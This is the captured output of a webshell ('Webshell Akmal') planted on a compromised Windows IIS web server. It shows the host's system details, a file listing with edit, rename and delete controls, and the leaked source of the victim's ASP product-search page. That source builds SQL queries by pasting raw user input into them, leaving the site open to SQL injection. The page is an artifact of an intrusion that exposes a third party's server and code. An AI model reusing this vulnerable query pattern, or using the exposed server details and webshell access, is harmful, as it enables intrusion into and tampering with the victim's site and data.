Webshell Akmal archtte id

System: Microsoft Windows NT 10.0.20348.0

Server: Microsoft-IIS/10.0

User: buyyou

Directory: C:\MyData\WWW\asc365\

Name	Size	Type	Actions
ASC365_CANADA	-	Directory	Rename Delete
ASC365_Store01	-	Directory	Rename Delete
aspnet_client	-	Directory	Rename Delete
CompanyImage	-	Directory	Rename Delete
TJGS_USA	-	Directory	Rename Delete
zhijian	-	Directory	Rename Delete
Memo.inc	0 bytes	.inc	Edit Rename Delete
web.config	213 bytes	.config	Edit Rename Delete

<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
 
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Search Product</title>
<style type="text/css">

</style>
<%
searchname=request.Form("searchtext")
typeid=request.Form("typeid")
Session("typeid")=typeid

%>
</head>
<body style=" text-align:center; margin:0 auto; width:1000px;background-color:#F1F1F1; margin:0 auto"> 
<table width="1000" border="0" cellpadding="0" cellspacing="0" style="background-color:#ffffff">
  <tr>
    <th colspan="2" scope="col">
	<%
     server.Execute("head.asp")
    %>
	</th>
  </tr>
  <tr>
    <td width="200" valign="top">	
	<%
    server.Execute("daohang.asp")
    %>
</td>
    <td width="800" valign="top">
	<%
	if len(searchname)=0 or searchname="Enter a Item#(6 digits, e.g.160823) or Keywords" then
	 if typeid=0 then
	 response.Redirect("index.asp")
	 else
	response.Redirect("productlist.asp?typeid="&typeid&"")
	 end if
	end if
	 dim sch(50)
	 temp1=split(searchname," ")
     for aa=0 to ubound(temp1)
     if len(temp1(aa))>0 and temp1(aa)<>" " then
     sch(aa)=temp1(aa)
     aa=aa+1
     end if
     next
	if len(searchname)=6 and isnumeric(searchname)=true then
	set rs=server.CreateObject("adodb.recordset")
	sql="select * from newproductlist where productid='"&searchname&"'"
	rs.open sql,conn,1,1
	if not rs.eof then
	productid=rs("productid")
	productname=rs("productname")
	price1=rs("price1")
	price2=rs("price2")
	tejia=rs("tejia")
	productdetail=rs("productdetail")
	
	%>
	<table style="width:799px;" border="0">
      <tr>
        <td width="120"><a href="newproductdetail.asp?productid=<%=rs("productid")%>&amp;typeid=<%=rs("typeid")%>" target="_blank"><img src="<%=rs("ImgPrev")%>" alt="1" border="0" style="width:120px"/></a></td>
        <td width="400"><table width="400px" height="100px" border="0" cellspacing="0" cellpadding="0" style="text-align:left; margin-left:20px;background-color:#FFFFFF">
            <tr>
              <th scope="col"><div align="left"><a href="newproductdetail.asp?productid=<%=rs("productid")%>&amp;typeid=<%=rs("typeid")%>" style="text-decoration:none" target="_blank"><%=rs("productname")%></a></div></th>
            </tr>
            <tr>
              <td></td>
            </tr>
            <tr>
              <td>&nbsp;</td>
            </tr>
        </table></td>
        <td  valign="top" style=" text-align:left; background-color:#FFFFFF ">
		<%
	productprice=rs("price1")
	if rs("tejia")=1 then
	productprice=rs("price2")
	end if
	%>
     $<%=productprice%> </td>
      </tr>
    </table>
	<%
	   end if
	else
	dim product(3000,8)
	ss=0
	for ii=0 to aa-1
	if len(sch(ii))>0 then
	set rs=server.CreateObject("adodb.recordset")
	sql="select * from newproductlist where productname like '%"&sch(ii)&"%'"
	rs.open sql,conn,1,1
	do while not rs.eof 
	product(ss,0)=rs("productid")
	product(ss,1)=rs("productname")
	product(ss,2)=rs("typeid")
	product(ss,3)=rs("ImgPrev")
	product(ss,4)=rs("productdetail")
	product(ss,5)=rs("price1")
	product(ss,6)=rs("price2")
	product(ss,7)=rs("tejia")
	ss=ss+1
	rs.movenext
	loop
	end if
	next
	for sss=0 to ss-1
	if len(product(sss,0))>0 and Isnumeric(product(sss,0))=true then
	%>
	<table style="width:799px;" border="0">
      <tr>
        <td width="120"><a href="newproductdetail.asp?productid=<%=product(sss,0)%>&amp;typeid=<%=product(sss,2)%>" target="_blank"><img src="<%=product(sss,3)%>" alt="1" border="0" style="width:120px"/></a></td>
        <td width="400"><table width="400px" height="100px" border="0" cellspacing="0" cellpadding="0" style="text-align:left; margin-left:20px;background-color:#FFFFFF">
            <tr>
              <th scope="col"><div align="left"><a href="newproductdetail.asp?productid=<%=product(sss,0)%>&amp;typeid=<%=product(sss,2)%>" style="text-decoration:none" target="_blank"><%=product(sss,1)%></a></div></th>
            </tr>
            <tr>
              <td></td>
            </tr>
            <tr>
              <td>&nbsp;</td>
            </tr>
        </table></td>
        <td  valign="top" style=" text-align:left; background-color:#FFFFFF ">
		<%
	productprice=product(sss,5)
	if product(sss,7)=1 then
	productprice=product(sss,6)
	end if
	%>
     $<%=productprice%> </td>
      </tr>
    </table>
	<%
	end if
	next
	for ssss=0 to ss-1
	product(ssss,0)=""
	next
	end if	
	%>
	</td>
  </tr>
  <tr>
    <td colspan="2">
	<%
      server.Execute("bottom.asp")
    %>
	</td>
  </tr>
</table>
  <%
 conn.close
 set conn=nothing
  %>
</body>
</html>